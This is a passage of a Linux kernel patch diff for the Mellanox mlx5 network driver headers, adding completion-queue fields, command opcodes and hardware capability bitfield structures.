u8 lro_min_ttl; + __be16 lro_tcp_win; + __be32 lro_ack_seq_num; + __be32 rss_hash_result; + u8 rss_hash_type; u8 ml_path; - u8 rsvd20[4]; + u8 rsvd20[2]; + __be16 check_sum; __be16 slid; __be32 flags_rqpn; - u8 rsvd28[4]; - __be32 srqn; + u8 hds_ip_ext; + u8 l4_hdr_type_etc; + __be16 vlan_info; + __be32 srqn; /* [31:24]: lro_num_seg, [23:0]: srqn */ __be32 imm_inval_pkey; u8 rsvd40[4]; __be32 byte_cnt; @@ -571,6 +594,40 @@ struct mlx5_cqe64 { u8 op_own; }; +static inline int get_cqe_lro_tcppsh(struct mlx5_cqe64 *cqe) +{ + return (cqe->lro_tcppsh_abort_dupack >> 6) & 1; +} + +static inline u8 get_cqe_l4_hdr_type(struct mlx5_cqe64 *cqe) +{ + return (cqe->l4_hdr_type_etc >> 4) & 0x7; +} + +static inline int cqe_has_vlan(struct mlx5_cqe64 *cqe) +{ + return !!(cqe->l4_hdr_type_etc & 0x1); +} + +enum { + CQE_L4_HDR_TYPE_NONE = 0x0, + CQE_L4_HDR_TYPE_TCP_NO_ACK = 0x1, + CQE_L4_HDR_TYPE_UDP = 0x2, + CQE_L4_HDR_TYPE_TCP_ACK_NO_DATA = 0x3, + CQE_L4_HDR_TYPE_TCP_ACK_AND_DATA = 0x4, +}; + +enum { + CQE_RSS_HTYPE_IP = 0x3 << 6, + CQE_RSS_HTYPE_L4 = 0x3 << 2, +}; + +enum { + CQE_L2_OK = 1 << 0, + CQE_L3_OK = 1 << 1, + CQE_L4_OK = 1 << 2, +}; + struct mlx5_sig_err_cqe { u8 rsvd0[16]; __be32 expected_trans_sig; @@ -996,4 +1053,52 @@ struct mlx5_destroy_psv_out { u8 rsvd[8]; }; +#define MLX5_CMD_OP_MAX 0x920 + +enum { + VPORT_STATE_DOWN = 0x0, + VPORT_STATE_UP = 0x1, +}; + +enum { + MLX5_L3_PROT_TYPE_IPV4 = 0, + MLX5_L3_PROT_TYPE_IPV6 = 1, +}; + +enum { + MLX5_L4_PROT_TYPE_TCP = 0, + MLX5_L4_PROT_TYPE_UDP = 1, +}; + +enum { + MLX5_HASH_FIELD_SEL_SRC_IP = 1 << 0, + MLX5_HASH_FIELD_SEL_DST_IP = 1 << 1, + MLX5_HASH_FIELD_SEL_L4_SPORT = 1 << 2, + MLX5_HASH_FIELD_SEL_L4_DPORT = 1 << 3, + MLX5_HASH_FIELD_SEL_IPSEC_SPI = 1 << 4, +}; + +enum { + MLX5_MATCH_OUTER_HEADERS = 1 << 0, + MLX5_MATCH_MISC_PARAMETERS = 1 << 1, + MLX5_MATCH_INNER_HEADERS = 1 << 2, + +}; + +enum { + MLX5_FLOW_TABLE_TYPE_NIC_RCV = 0, + MLX5_FLOW_TABLE_TYPE_ESWITCH = 4, +}; + +enum { + MLX5_FLOW_CONTEXT_DEST_TYPE_VPORT = 0, + MLX5_FLOW_CONTEXT_DEST_TYPE_FLOW_TABLE = 1, + MLX5_FLOW_CONTEXT_DEST_TYPE_TIR = 2, +}; + +enum { + MLX5_RQC_RQ_TYPE_MEMORY_RQ_INLINE = 0x0, + MLX5_RQC_RQ_TYPE_MEMORY_RQ_RPM = 0x1, +}; + #endif /* MLX5_DEVICE_H */ diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 9e8979502826..3fd4fdc1ba16 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -44,7 +44,6 @@ #include #include -#include enum { MLX5_BOARD_ID_LEN = 64, @@ -278,7 +277,6 @@ struct mlx5_general_caps { u8 log_max_mkey; u8 log_max_pd; u8 log_max_srq; - u8 log_max_strq; u8 log_max_mrw_sz; u8 log_max_bsf_list_size; u8 log_max_klm_list_size; @@ -664,6 +662,8 @@ int mlx5_cmd_alloc_uar(struct mlx5_core_dev *dev, u32 *uarn); int mlx5_cmd_free_uar(struct mlx5_core_dev *dev, u32 uarn); int mlx5_alloc_uuars(struct mlx5_core_dev *dev, struct mlx5_uuar_info *uuari); int mlx5_free_uuars(struct mlx5_core_dev *dev, struct mlx5_uuar_info *uuari); +int mlx5_alloc_map_uar(struct mlx5_core_dev *mdev, struct mlx5_uar *uar); +void mlx5_unmap_free_uar(struct mlx5_core_dev *mdev, struct mlx5_uar *uar); void mlx5_health_cleanup(void); void __init mlx5_health_init(void); void mlx5_start_health_poll(struct mlx5_core_dev *dev); diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h index cb3ad17edd1f..b27e9f6e090a 100644 --- a/include/linux/mlx5/mlx5_ifc.h +++ b/include/linux/mlx5/mlx5_ifc.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2013-2015, Mellanox Technologies. All rights reserved. 
+ * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. * * This software is available to you under a choice of one of two * licenses. You may choose to be licensed under the terms of the GNU @@ -28,11 +28,44 @@ * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. - */ - +*/ #ifndef MLX5_IFC_H #define MLX5_IFC_H +enum { + MLX5_EVENT_TYPE_CODING_COMPLETION_EVENTS = 0x0, + MLX5_EVENT_TYPE_CODING_PATH_MIGRATED_SUCCEEDED = 0x1, + MLX5_EVENT_TYPE_CODING_COMMUNICATION_ESTABLISHED = 0x2, + MLX5_EVENT_TYPE_CODING_SEND_QUEUE_DRAINED = 0x3, + MLX5_EVENT_TYPE_CODING_LAST_WQE_REACHED = 0x13, + MLX5_EVENT_TYPE_CODING_SRQ_LIMIT = 0x14, + MLX5_EVENT_TYPE_CODING_DCT_ALL_CONNECTIONS_CLOSED = 0x1c, + MLX5_EVENT_TYPE_CODING_DCT_ACCESS_KEY_VIOLATION = 0x1d, + MLX5_EVENT_TYPE_CODING_CQ_ERROR = 0x4, + MLX5_EVENT_TYPE_CODING_LOCAL_WQ_CATASTROPHIC_ERROR = 0x5, + MLX5_EVENT_TYPE_CODING_PATH_MIGRATION_FAILED = 0x7, + MLX5_EVENT_TYPE_CODING_PAGE_FAULT_EVENT = 0xc, + MLX5_EVENT_TYPE_CODING_INVALID_REQUEST_LOCAL_WQ_ERROR = 0x10, + MLX5_EVENT_TYPE_CODING_LOCAL_ACCESS_VIOLATION_WQ_ERROR = 0x11, + MLX5_EVENT_TYPE_CODING_LOCAL_SRQ_CATASTROPHIC_ERROR = 0x12, + MLX5_EVENT_TYPE_CODING_INTERNAL_ERROR = 0x8, + MLX5_EVENT_TYPE_CODING_PORT_STATE_CHANGE = 0x9, + MLX5_EVENT_TYPE_CODING_GPIO_EVENT = 0x15, + MLX5_EVENT_TYPE_CODING_REMOTE_CONFIGURATION_PROTOCOL_EVENT = 0x19, + MLX5_EVENT_TYPE_CODING_DOORBELL_BLUEFLAME_CONGESTION_EVENT = 0x1a, + MLX5_EVENT_TYPE_CODING_STALL_VL_EVENT = 0x1b, + MLX5_EVENT_TYPE_CODING_DROPPED_PACKET_LOGGED_EVENT = 0x1f, + MLX5_EVENT_TYPE_CODING_COMMAND_INTERFACE_COMPLETION = 0xa, + MLX5_EVENT_TYPE_CODING_PAGE_REQUEST = 0xb +}; + +enum { + MLX5_MODIFY_TIR_BITMASK_LRO = 0x0, + MLX5_MODIFY_TIR_BITMASK_INDIRECT_TABLE = 0x1, + MLX5_MODIFY_TIR_BITMASK_HASH = 0x2, + MLX5_MODIFY_TIR_BITMASK_TUNNELED_OFFLOAD_EN = 0x3 +}; + enum { MLX5_CMD_OP_QUERY_HCA_CAP = 0x100, MLX5_CMD_OP_QUERY_ADAPTER = 0x101, @@ -43,6 +76,8 @@ enum { MLX5_CMD_OP_QUERY_PAGES = 0x107, MLX5_CMD_OP_MANAGE_PAGES = 0x108, MLX5_CMD_OP_SET_HCA_CAP = 0x109, + MLX5_CMD_OP_QUERY_ISSI = 0x10a, + MLX5_CMD_OP_SET_ISSI = 0x10b, MLX5_CMD_OP_CREATE_MKEY = 0x200, MLX5_CMD_OP_QUERY_MKEY = 0x201, MLX5_CMD_OP_DESTROY_MKEY = 0x202, @@ -66,6 +101,7 @@ enum { MLX5_CMD_OP_2ERR_QP = 0x507, MLX5_CMD_OP_2RST_QP = 0x50a, MLX5_CMD_OP_QUERY_QP = 0x50b, + MLX5_CMD_OP_SQD_RTS_QP = 0x50c, MLX5_CMD_OP_INIT2INIT_QP = 0x50e, MLX5_CMD_OP_CREATE_PSV = 0x600, MLX5_CMD_OP_DESTROY_PSV = 0x601, @@ -73,7 +109,10 @@ enum { MLX5_CMD_OP_DESTROY_SRQ = 0x701, MLX5_CMD_OP_QUERY_SRQ = 0x702, MLX5_CMD_OP_ARM_RQ = 0x703, - MLX5_CMD_OP_RESIZE_SRQ = 0x704, + MLX5_CMD_OP_CREATE_XRC_SRQ = 0x705, + MLX5_CMD_OP_DESTROY_XRC_SRQ = 0x706, + MLX5_CMD_OP_QUERY_XRC_SRQ = 0x707, + MLX5_CMD_OP_ARM_XRC_SRQ = 0x708, MLX5_CMD_OP_CREATE_DCT = 0x710, MLX5_CMD_OP_DESTROY_DCT = 0x711, MLX5_CMD_OP_DRAIN_DCT = 0x712, @@ -85,8 +124,12 @@ enum { MLX5_CMD_OP_MODIFY_ESW_VPORT_CONTEXT = 0x753, MLX5_CMD_OP_QUERY_NIC_VPORT_CONTEXT = 0x754, MLX5_CMD_OP_MODIFY_NIC_VPORT_CONTEXT = 0x755, - MLX5_CMD_OP_QUERY_RCOE_ADDRESS = 0x760, + MLX5_CMD_OP_QUERY_ROCE_ADDRESS = 0x760, MLX5_CMD_OP_SET_ROCE_ADDRESS = 0x761, + MLX5_CMD_OP_QUERY_HCA_VPORT_CONTEXT = 0x762, + MLX5_CMD_OP_MODIFY_HCA_VPORT_CONTEXT = 0x763, + MLX5_CMD_OP_QUERY_HCA_VPORT_GID = 0x764, + MLX5_CMD_OP_QUERY_HCA_VPORT_PKEY = 0x765, MLX5_CMD_OP_QUERY_VPORT_COUNTER = 0x770, MLX5_CMD_OP_ALLOC_Q_COUNTER = 0x771, MLX5_CMD_OP_DEALLOC_Q_COUNTER = 0x772, @@ -98,7 
+141,7 @@ enum { MLX5_CMD_OP_CONFIG_INT_MODERATION = 0x804, MLX5_CMD_OP_ACCESS_REG = 0x805, MLX5_CMD_OP_ATTACH_TO_MCG = 0x806, - MLX5_CMD_OP_DETACH_FROM_MCG = 0x807, + MLX5_CMD_OP_DETTACH_FROM_MCG = 0x807, MLX5_CMD_OP_GET_DROPPED_PACKET_LOG = 0x80a, MLX5_CMD_OP_MAD_IFC = 0x50d, MLX5_CMD_OP_QUERY_MAD_DEMUX = 0x80b, @@ -106,23 +149,22 @@ enum { MLX5_CMD_OP_NOP = 0x80d, MLX5_CMD_OP_ALLOC_XRCD = 0x80e, MLX5_CMD_OP_DEALLOC_XRCD = 0x80f, - MLX5_CMD_OP_SET_BURST_SIZE = 0x812, - MLX5_CMD_OP_QUERY_BURST_SZIE = 0x813, - MLX5_CMD_OP_ACTIVATE_TRACER = 0x814, - MLX5_CMD_OP_DEACTIVATE_TRACER = 0x815, - MLX5_CMD_OP_CREATE_SNIFFER_RULE = 0x820, - MLX5_CMD_OP_DESTROY_SNIFFER_RULE = 0x821, - MLX5_CMD_OP_QUERY_CONG_PARAMS = 0x822, - MLX5_CMD_OP_MODIFY_CONG_PARAMS = 0x823, - MLX5_CMD_OP_QUERY_CONG_STATISTICS = 0x824, + MLX5_CMD_OP_ALLOC_TRANSPORT_DOMAIN = 0x816, + MLX5_CMD_OP_DEALLOC_TRANSPORT_DOMAIN = 0x817, + MLX5_CMD_OP_QUERY_CONG_STATUS = 0x822, + MLX5_CMD_OP_MODIFY_CONG_STATUS = 0x823, + MLX5_CMD_OP_QUERY_CONG_PARAMS = 0x824, + MLX5_CMD_OP_MODIFY_CONG_PARAMS = 0x825, + MLX5_CMD_OP_QUERY_CONG_STATISTICS = 0x826, + MLX5_CMD_OP_ADD_VXLAN_UDP_DPORT = 0x827, + MLX5_CMD_OP_DELETE_VXLAN_UDP_DPORT = 0x828, + MLX5_CMD_OP_SET_L2_TABLE_ENTRY = 0x829, + MLX5_CMD_OP_QUERY_L2_TABLE_ENTRY = 0x82a, + MLX5_CMD_OP_DELETE_L2_TABLE_ENTRY = 0x82b, MLX5_CMD_OP_CREATE_TIR = 0x900, MLX5_CMD_OP_MODIFY_TIR = 0x901, MLX5_CMD_OP_DESTROY_TIR = 0x902, MLX5_CMD_OP_QUERY_TIR = 0x903, - MLX5_CMD_OP_CREATE_TIS = 0x912, - MLX5_CMD_OP_MODIFY_TIS = 0x913, - MLX5_CMD_OP_DESTROY_TIS = 0x914, - MLX5_CMD_OP_QUERY_TIS = 0x915, MLX5_CMD_OP_CREATE_SQ = 0x904, MLX5_CMD_OP_MODIFY_SQ = 0x905, MLX5_CMD_OP_DESTROY_SQ = 0x906, @@ -135,9 +177,430 @@ enum { MLX5_CMD_OP_MODIFY_RMP = 0x90d, MLX5_CMD_OP_DESTROY_RMP = 0x90e, MLX5_CMD_OP_QUERY_RMP = 0x90f, - MLX5_CMD_OP_SET_FLOW_TABLE_ENTRY = 0x910, - MLX5_CMD_OP_QUERY_FLOW_TABLE_ENTRY = 0x911, - MLX5_CMD_OP_MAX = 0x911 + MLX5_CMD_OP_CREATE_TIS = 0x912, + MLX5_CMD_OP_MODIFY_TIS = 0x913, + MLX5_CMD_OP_DESTROY_TIS = 0x914, + MLX5_CMD_OP_QUERY_TIS = 0x915, + MLX5_CMD_OP_CREATE_RQT = 0x916, + MLX5_CMD_OP_MODIFY_RQT = 0x917, + MLX5_CMD_OP_DESTROY_RQT = 0x918, + MLX5_CMD_OP_QUERY_RQT = 0x919, + MLX5_CMD_OP_CREATE_FLOW_TABLE = 0x930, + MLX5_CMD_OP_DESTROY_FLOW_TABLE = 0x931, + MLX5_CMD_OP_QUERY_FLOW_TABLE = 0x932, + MLX5_CMD_OP_CREATE_FLOW_GROUP = 0x933, + MLX5_CMD_OP_DESTROY_FLOW_GROUP = 0x934, + MLX5_CMD_OP_QUERY_FLOW_GROUP = 0x935, + MLX5_CMD_OP_SET_FLOW_TABLE_ENTRY = 0x936, + MLX5_CMD_OP_QUERY_FLOW_TABLE_ENTRY = 0x937, + MLX5_CMD_OP_DELETE_FLOW_TABLE_ENTRY = 0x938 +}; + +struct mlx5_ifc_flow_table_fields_supported_bits { + u8 outer_dmac[0x1]; + u8 outer_smac[0x1]; + u8 outer_ether_type[0x1]; + u8 reserved_0[0x1]; + u8 outer_first_prio[0x1]; + u8 outer_first_cfi[0x1]; + u8 outer_first_vid[0x1]; + u8 reserved_1[0x1]; + u8 outer_second_prio[0x1]; + u8 outer_second_cfi[0x1]; + u8 outer_second_vid[0x1]; + u8 reserved_2[0x1]; + u8 outer_sip[0x1]; + u8 outer_dip[0x1]; + u8 outer_frag[0x1]; + u8 outer_ip_protocol[0x1]; + u8 outer_ip_ecn[0x1]; + u8 outer_ip_dscp[0x1]; + u8 outer_udp_sport[0x1]; + u8 outer_udp_dport[0x1]; + u8 outer_tcp_sport[0x1]; + u8 outer_tcp_dport[0x1]; + u8 outer_tcp_flags[0x1]; + u8 outer_gre_protocol[0x1]; + u8 outer_gre_key[0x1]; + u8 outer_vxlan_vni[0x1]; + u8 reserved_3[0x5]; + u8 source_eswitch_port[0x1]; + + u8 inner_dmac[0x1]; + u8 inner_smac[0x1]; + u8 inner_ether_type[0x1]; + u8 reserved_4[0x1]; + u8 inner_first_prio[0x1]; + u8 inner_first_cfi[0x1]; + u8 inner_first_vid[0x1]; + u8 
reserved_5[0x1]; + u8 inner_second_prio[0x1]; + u8 inner_second_cfi[0x1]; + u8 inner_second_vid[0x1]; + u8 reserved_6[0x1]; + u8 inner_sip[0x1]; + u8 inner_dip[0x1]; + u8 inner_frag[0x1]; + u8 inner_ip_protocol[0x1]; + u8 inner_ip_ecn[0x1]; + u8 inner_ip_dscp[0x1]; + u8 inner_udp_sport[0x1]; + u8 inner_udp_dport[0x1]; + u8 inner_tcp_sport[0x1]; + u8 inner_tcp_dport[0x1]; + u8 inner_tcp_flags[0x1]; + u8 reserved_7[0x9]; + + u8 reserved_8[0x40]; +}; + +struct mlx5_ifc_flow_table_prop_layout_bits { + u8 ft_support[0x1]; + u8 reserved_0[0x1f]; + + u8 reserved_1[0x2]; + u8 log_max_ft_size[0x6]; + u8 reserved_2[0x10]; + u8 max_ft_level[0x8]; + + u8 reserved_3[0x20]; + + u8 reserved_4[0x18]; + u8 log_max_ft_num[0x8]; + + u8 reserved_5[0x18]; + u8 log_max_destination[0x8]; + + u8 reserved_6[0x18]; + u8 log_max_flow[0x8]; + + u8 reserved_7[0x40]; + + struct mlx5_ifc_flow_table_fields_supported_bits ft_field_support; + + struct mlx5_ifc_flow_table_fields_supported_bits ft_field_bitmask_support; +}; + +struct mlx5_ifc_odp_per_transport_service_cap_bits { + u8 send[0x1]; + u8 receive[0x1]; + u8 write[0x1]; + u8 read[0x1]; + u8 reserved_0[0x1]; + u8 srq_receive[0x1]; + u8 reserved_1[0x1a]; +}; + +struct mlx5_ifc_fte_match_set_lyr_2_4_bits { + u8 smac_47_16[0x20]; + + u8 smac_15_0[0x10]; + u8 ethertype[0x10]; + + u8 dmac_47_16[0x20]; + + u8 dmac_15_0[0x10]; + u8 first_prio[0x3]; + u8 first_cfi[0x1]; + u8 first_vid[0xc]; + + u8 ip_protocol[0x8]; + u8 ip_dscp[0x6]; + u8 ip_ecn[0x2]; + u8 vlan_tag[0x1]; + u8 reserved_0[0x1]; + u8 frag[0x1]; + u8 reserved_1[0x4]; + u8 tcp_flags[0x9]; + + u8 tcp_sport[0x10]; + u8 tcp_dport[0x10]; + + u8 reserved_2[0x20]; + + u8 udp_sport[0x10]; + u8 udp_dport[0x10]; + + u8 src_ip[4][0x20]; + + u8 dst_ip[4][0x20]; +}; + +struct mlx5_ifc_fte_match_set_misc_bits { + u8 reserved_0[0x20]; + + u8 reserved_1[0x10]; + u8 source_port[0x10]; + + u8 outer_second_prio[0x3]; + u8 outer_second_cfi[0x1]; + u8 outer_second_vid[0xc]; + u8 inner_second_prio[0x3]; + u8 inner_second_cfi[0x1]; + u8 inner_second_vid[0xc]; + + u8 outer_second_vlan_tag[0x1]; + u8 inner_second_vlan_tag[0x1]; + u8 reserved_2[0xe]; + u8 gre_protocol[0x10]; + + u8 gre_key_h[0x18]; + u8 gre_key_l[0x8]; + + u8 vxlan_vni[0x18]; + u8 reserved_3[0x8]; + + u8 reserved_4[0x20]; + + u8 reserved_5[0xc]; + u8 outer_ipv6_flow_label[0x14]; + + u8 reserved_6[0xc]; + u8 inner_ipv6_flow_label[0x14]; + + u8 reserved_7[0xe0]; +}; + +struct mlx5_ifc_cmd_pas_bits { + u8 pa_h[0x20]; + + u8 pa_l[0x14]; + u8 reserved_0[0xc]; +}; + +struct mlx5_ifc_uint64_bits { + u8 hi[0x20]; + + u8 lo[0x20]; +}; + +enum { + MLX5_ADS_STAT_RATE_NO_LIMIT = 0x0, + MLX5_ADS_STAT_RATE_2_5GBPS = 0x7, + MLX5_ADS_STAT_RATE_10GBPS = 0x8, + MLX5_ADS_STAT_RATE_30GBPS = 0x9, + MLX5_ADS_STAT_RATE_5GBPS = 0xa, + MLX5_ADS_STAT_RATE_20GBPS = 0xb, + MLX5_ADS_STAT_RATE_40GBPS = 0xc, + MLX5_ADS_STAT_RATE_60GBPS = 0xd, + MLX5_ADS_STAT_RATE_80GBPS = 0xe, + MLX5_ADS_STAT_RATE_120GBPS = 0xf, +}; + +struct mlx5_ifc_ads_bits { + u8 fl[0x1]; + u8 free_ar[0x1]; + u8 reserved_0[0xe]; + u8 pkey_index[0x10]; + + u8 reserved_1[0x8]; + u8 grh[0x1]; + u8 mlid[0x7]; + u8 rlid[0x10]; + + u8 ack_timeout[0x5]; + u8 reserved_2[0x3]; + u8 src_addr_index[0x8]; + u8 reserved_3[0x4]; + u8 stat_rate[0x4]; + u8 hop_limit[0x8]; + + u8 reserved_4[0x4]; + u8 tclass[0x8]; + u8 flow_label[0x14]; + + u8 rgid_rip[16][0x8]; + + u8 reserved_5[0x4]; + u8 f_dscp[0x1]; + u8 f_ecn[0x1]; + u8 reserved_6[0x1]; + u8 f_eth_prio[0x1]; + u8 ecn[0x2]; + u8 dscp[0x6]; + u8 udp_sport[0x10]; + + u8 dei_cfi[0x1]; + u8 
eth_prio[0x3]; + u8 sl[0x4]; + u8 port[0x8]; + u8 rmac_47_32[0x10]; + + u8 rmac_31_0[0x20]; +}; + +struct mlx5_ifc_flow_table_nic_cap_bits { + u8 reserved_0[0x200]; + + struct mlx5_ifc_flow_table_prop_layout_bits flow_table_properties_nic_receive; + + u8 reserved_1[0x200]; + + struct mlx5_ifc_flow_table_prop_layout_bits flow_table_properties_nic_receive_sniffer; + + struct mlx5_ifc_flow_table_prop_layout_bits flow_table_properties_nic_transmit; + + u8 reserved_2[0x200]; + + struct mlx5_ifc_flow_table_prop_layout_bits flow_table_properties_nic_transmit_sniffer; + + u8 reserved_3[0x7200]; +}; + +struct mlx5_ifc_per_protocol_networking_offload_caps_bits { + u8 csum_cap[0x1]; + u8 vlan_cap[0x1]; + u8 lro_cap[0x1]; + u8 lro_psh_flag[0x1]; + u8 lro_time_stamp[0x1]; + u8 reserved_0[0x6]; + u8 max_lso_cap[0x5]; + u8 reserved_1[0x4]; + u8 rss_ind_tbl_cap[0x4]; + u8 reserved_2[0x3]; + u8 tunnel_lso_const_out_ip_id[0x1]; + u8 reserved_3[0x2]; + u8 tunnel_statless_gre[0x1]; + u8 tunnel_stateless_vxlan[0x1]; + + u8 reserved_4[0x20]; + + u8 reserved_5[0x10]; + u8 lro_min_mss_size[0x10]; + + u8 reserved_6[0x120]; + + u8 lro_timer_supported_periods[4][0x20]; + + u8 reserved_7[0x600]; +}; + +struct mlx5_ifc_roce_cap_bits { + u8 roce_apm[0x1]; + u8 reserved_0[0x1f]; + + u8 reserved_1[0x60]; + + u8 reserved_2[0xc]; + u8 l3_type[0x4]; + u8 reserved_3[0x8]; + u8 roce_version[0x8]; + + u8 reserved_4[0x10]; + u8 r_roce_dest_udp_port[0x10]; + + u8 r_roce_max_src_udp_port[0x10]; + u8 r_roce_min_src_udp_port[0x10]; + + u8 reserved_5[0x10]; + u8 roce_address_table_size[0x10]; + + u8 reserved_6[0x700]; +}; + +enum { + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_1_BYTE = 0x0, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_2_BYTES = 0x2, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_4_BYTES = 0x4, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_8_BYTES = 0x8, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_16_BYTES = 0x10, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_32_BYTES = 0x20, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_64_BYTES = 0x40, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_128_BYTES = 0x80, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_256_BYTES = 0x100, +}; + +enum { + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_1_BYTE = 0x1, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_2_BYTES = 0x2, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_4_BYTES = 0x4, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_8_BYTES = 0x8, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_16_BYTES = 0x10, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_32_BYTES = 0x20, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_64_BYTES = 0x40, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_128_BYTES = 0x80, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_256_BYTES = 0x100, +}; + +struct mlx5_ifc_atomic_caps_bits { + u8 reserved_0[0x40]; + + u8 atomic_req_endianness[0x1]; + u8 reserved_1[0x1f]; + + u8 reserved_2[0x20]; + + u8 reserved_3[0x10]; + u8 atomic_operations[0x10]; + + u8 reserved_4[0x10]; + u8 atomic_size_qp[0x10]; + + u8 reserved_5[0x10]; + u8 atomic_size_dc[0x10]; + + u8 reserved_6[0x720]; +}; + +struct mlx5_ifc_odp_cap_bits { + u8 reserved_0[0x40]; + + u8 sig[0x1]; + u8 reserved_1[0x1f]; + + u8 reserved_2[0x20]; + + struct mlx5_ifc_odp_per_transport_service_cap_bits rc_odp_caps; + + struct mlx5_ifc_odp_per_transport_service_cap_bits uc_odp_caps; + + struct mlx5_ifc_odp_per_transport_service_cap_bits ud_odp_caps; + + u8 reserved_3[0x720]; +}; + +enum { + MLX5_WQ_TYPE_LINKED_LIST = 0x0, + MLX5_WQ_TYPE_CYCLIC = 0x1, + MLX5_WQ_TYPE_STRQ = 0x2, +}; + +enum { + MLX5_WQ_END_PAD_MODE_NONE = 0x0, + MLX5_WQ_END_PAD_MODE_ALIGN = 0x1, +}; + +enum { + MLX5_CMD_HCA_CAP_GID_TABLE_SIZE_8_GID_ENTRIES = 0x0, + MLX5_CMD_HCA_CAP_GID_TABLE_SIZE_16_GID_ENTRIES = 0x1, + 
MLX5_CMD_HCA_CAP_GID_TABLE_SIZE_32_GID_ENTRIES = 0x2, + MLX5_CMD_HCA_CAP_GID_TABLE_SIZE_64_GID_ENTRIES = 0x3, + MLX5_CMD_HCA_CAP_GID_TABLE_SIZE_128_GID_ENTRIES = 0x4, +}; + +enum { + MLX5_CMD_HCA_CAP_PKEY_TABLE_SIZE_128_ENTRIES = 0x0, + MLX5_CMD_HCA_CAP_PKEY_TABLE_SIZE_256_ENTRIES = 0x1, + MLX5_CMD_HCA_CAP_PKEY_TABLE_SIZE_512_ENTRIES = 0x2, + MLX5_CMD_HCA_CAP_PKEY_TABLE_SIZE_1K_ENTRIES = 0x3, + MLX5_CMD_HCA_CAP_PKEY_TABLE_SIZE_2K_ENTRIES = 0x4, + MLX5_CMD_HCA_CAP_PKEY_TABLE_SIZE_4K_ENTRIES = 0x5, +}; + +enum { + MLX5_CMD_HCA_CAP_PORT_TYPE_IB = 0x0, + MLX5_CMD_HCA_CAP_PORT_TYPE_ETHERNET = 0x1, +}; + +enum { + MLX5_CMD_HCA_CAP_CMDIF_CHECKSUM_DISABLED = 0x0, + MLX5_CMD_HCA_CAP_CMDIF_CHECKSUM_INITIAL_STATE = 0x1, + MLX5_CMD_HCA_CAP_CMDIF_CHECKSUM_ENABLED = 0x3, +}; + +enum { + MLX5_CAP_PORT_TYPE_IB = 0x0, + MLX5_CAP_PORT_TYPE_ETH = 0x1, }; struct mlx5_ifc_cmd_hca_cap_bits { @@ -148,9 +611,8 @@ struct mlx5_ifc_cmd_hca_cap_bits { u8 reserved_1[0xb]; u8 log_max_qp[0x5]; - u8 log_max_strq_sz[0x8]; - u8 reserved_2[0x3]; - u8 log_max_srqs[0x5]; + u8 reserved_2[0xb]; + u8 log_max_srq[0x5]; u8 reserved_3[0x10]; u8 reserved_4[0x8]; @@ -185,165 +647,6123 @@ struct mlx5_ifc_cmd_hca_cap_bits { u8 pad_cap[0x1]; u8 cc_query_allowed[0x1]; u8 cc_modify_allowed[0x1]; - u8 reserved_15[0x1d]; + u8 reserved_15[0xd]; + u8 gid_table_size[0x10]; - u8 reserved_16[0x6]; + u8 out_of_seq_cnt[0x1]; + u8 vport_counters[0x1]; + u8 reserved_16[0x4]; u8 max_qp_cnt[0xa]; u8 pkey_table_size[0x10]; - u8 eswitch_owner[0x1]; - u8 reserved_17[0xa]; + u8 vport_group_manager[0x1]; + u8 vhca_group_manager[0x1]; + u8 ib_virt[0x1]; + u8 eth_virt[0x1]; + u8 reserved_17[0x1]; + u8 ets[0x1]; + u8 nic_flow_table[0x1]; + u8 reserved_18[0x4]; u8 local_ca_ack_delay[0x5]; - u8 reserved_18[0x8]; + u8 reserved_19[0x6]; + u8 port_type[0x2]; u8 num_ports[0x8]; - u8 reserved_19[0x3]; + u8 reserved_20[0x3]; u8 log_max_msg[0x5]; - u8 reserved_20[0x18]; + u8 reserved_21[0x18]; u8 stat_rate_support[0x10]; - u8 reserved_21[0x10]; + u8 reserved_22[0xc]; + u8 cqe_version[0x4]; - u8 reserved_22[0x10]; + u8 compact_address_vector[0x1]; + u8 reserved_23[0xe]; + u8 drain_sigerr[0x1]; u8 cmdif_checksum[0x2]; u8 sigerr_cqe[0x1]; - u8 reserved_23[0x1]; + u8 reserved_24[0x1]; u8 wq_signature[0x1]; u8 sctr_data_cqe[0x1]; - u8 reserved_24[0x1]; + u8 reserved_25[0x1]; u8 sho[0x1]; u8 tph[0x1]; u8 rf[0x1]; - u8 dc[0x1]; - u8 reserved_25[0x2]; + u8 dct[0x1]; + u8 reserved_26[0x1]; + u8 eth_net_offloads[0x1]; u8 roce[0x1]; u8 atomic[0x1]; - u8 rsz_srq[0x1]; + u8 reserved_27[0x1]; u8 cq_oi[0x1]; u8 cq_resize[0x1]; u8 cq_moderation[0x1]; - u8 sniffer_rule_flow[0x1]; - u8 sniffer_rule_vport[0x1]; - u8 sniffer_rule_phy[0x1]; - u8 reserved_26[0x1]; + u8 reserved_28[0x3]; + u8 cq_eq_remap[0x1]; u8 pg[0x1]; u8 block_lb_mc[0x1]; - u8 reserved_27[0x3]; + u8 reserved_29[0x1]; + u8 scqe_break_moderation[0x1]; + u8 reserved_30[0x1]; u8 cd[0x1]; - u8 reserved_28[0x1]; + 